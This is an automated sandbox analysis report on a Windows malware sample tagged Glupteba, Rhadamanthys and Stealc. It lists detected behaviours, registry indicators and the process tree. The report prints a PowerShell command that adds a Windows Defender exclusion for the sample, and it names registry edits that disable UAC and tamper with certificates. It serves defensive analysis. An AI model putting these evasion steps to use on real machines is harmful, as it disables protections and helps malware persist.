Analysis Overview
SHA256
ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae
Threat Level: Known bad
The file ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Glupteba payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Stealc
Modifies firewall policy service
Windows security bypass
Glupteba
UAC bypass
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Modifies Windows Firewall
Blocklisted process makes network request
Downloads MZ/PE file
Checks BIOS information in registry
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Themida packer
Checks computer location settings
Windows security modification
Reads data files stored by FTP clients
Loads dropped DLL
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Enumerates connected drives
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Enumerates system info in registry
Runs ping.exe
System policy modification
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Checks processor information in registry
Modifies system certificate store
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-28 12:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-28 12:58
Reported
2024-03-28 13:01
Platform
win10v2004-20240226-en
Max time kernel
113s
Max time network
174s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
Rhadamanthys
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4812 created 2424 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\system32\sihost.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSA38E.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\dGRFal8qQzpgtFutf7LbHsxR.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSA38E.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1zODrmp3iqlrL70ymyHxHZ7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WqzERsVQn7Fh6H7riw3XMctE.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CK1PRR7vT9hwKY8Cnvi9ejSQ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ByEgmEpg5srbU2rlGXxRbXGK.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6mCOvw8IOvhsjYTRr5tzFkti.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dy3Y8CbcBbk8bLrqg34ruIUM.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1tUqGOHmvmtiu9fUnhmEeuZe.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H2Mos0hDS1RNNHOs9Fqvxf0h.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Upstr2kazNGla9Rp077HNRay.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11x6QP3HUzuw3mwoRGyd4zeP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSA38E.tmp\Install.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2256 set thread context of 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
| PID 4988 set thread context of 4812 | N/A | C:\Users\Admin\Pictures\9J0qa6e7aiaDLK5JDqoWIdOI.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSA38E.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSA38E.tmp\Install.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ag.1.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe
"C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\Pictures\dGRFal8qQzpgtFutf7LbHsxR.exe
"C:\Users\Admin\Pictures\dGRFal8qQzpgtFutf7LbHsxR.exe"
C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe
"C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe"
C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe
"C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe"
C:\Users\Admin\Pictures\9J0qa6e7aiaDLK5JDqoWIdOI.exe
"C:\Users\Admin\Pictures\9J0qa6e7aiaDLK5JDqoWIdOI.exe"
C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe
"C:\Users\Admin\Pictures\qwm9RVjuf5jbu5aLONlULih1.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
